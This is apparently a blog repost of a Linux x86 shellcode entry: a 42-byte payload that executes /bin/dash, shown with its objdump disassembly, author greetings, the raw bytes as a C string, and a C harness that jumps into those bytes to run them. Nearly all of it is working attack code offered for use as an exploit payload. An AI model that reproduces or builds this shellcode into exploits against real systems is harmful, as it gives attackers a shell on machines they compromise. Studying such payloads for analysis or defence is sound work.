exploit linux/x86 execve(/bin/dash) 42 bytes

Sumber   :http://www.exploit-id.com/shellcode/linuxx86-execvebindash-42-bytes 
 
 Codenya   : 
 
 
/*
linux/x86 execve(/bin/dash) 42 bytes
Author  : X-h4ck
    mem001@live.com, mem003@live.com
    www.pirate.al , www.flashcrew.in
Greetz  : mywisdom - Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath
    ev1lut1on - Lekosta - Pretorian - bi0 - Slimshaddy - d3trimentaL
    CR - Hack-Down - H3ll - d4nte_sA - th3p0wer and all PirateAL friends.
PROUD TO BE ALBANIAN!
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
root@bt:~/Desktop# objdump -D sh
sh:  file format elf32-i386
Disassembly of section .text:
08048060 :
 8048060: eb 19     jmp 0x804807b
 8048062: 5b        pop %ebx
 8048063: b8 00 00 00 00     mov $0x0,%eax
 8048068: 88 43 09     mov %al,0x9(%ebx)
 804806b: 89 5b 0a     mov %ebx,0xa(%ebx)
 804806e: 89 43 0e     mov %eax,0xe(%ebx)
 8048071: b0 0b     mov $0xb,%al
 8048073: 8d 4b 0a     lea 0xa(%ebx),%ecx
 8048076: 8d 53 0e     lea 0xe(%ebx),%edx
 8048079: cd 80     int $0x80
 804807b: e8 e2 ff ff ff     call   0x8048062
 8048080: 2f        das
 8048081: 62 69 6e     bound  %ebp,0x6e(%ecx)
 8048084: 2f        das
 8048085: 64        fs
 8048086: 61        popa
 8048087: 73 68     jae 0x80480f1
*/
#include
char sc[] = "\xeb\x19\x5b\xb8\x00\x00\x00\x00\x88"
   "\x43\x09\x89\x5b\x0a\x89\x43\x0e\xb0"
   "\x0b\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80"
   "\xe8\xe2\xff\xff\xff\x2f\x62\x69\x6e"
   "\x2f\x64\x61\x73\x68";
void main(void)
{
    void(*s)(void);
    printf("madhesia : %d\n", sizeof(sc));
    s = sc;
    s();
}

0 Response to "exploit linux/x86 execve(/bin/dash) 42 bytes"

Post a Comment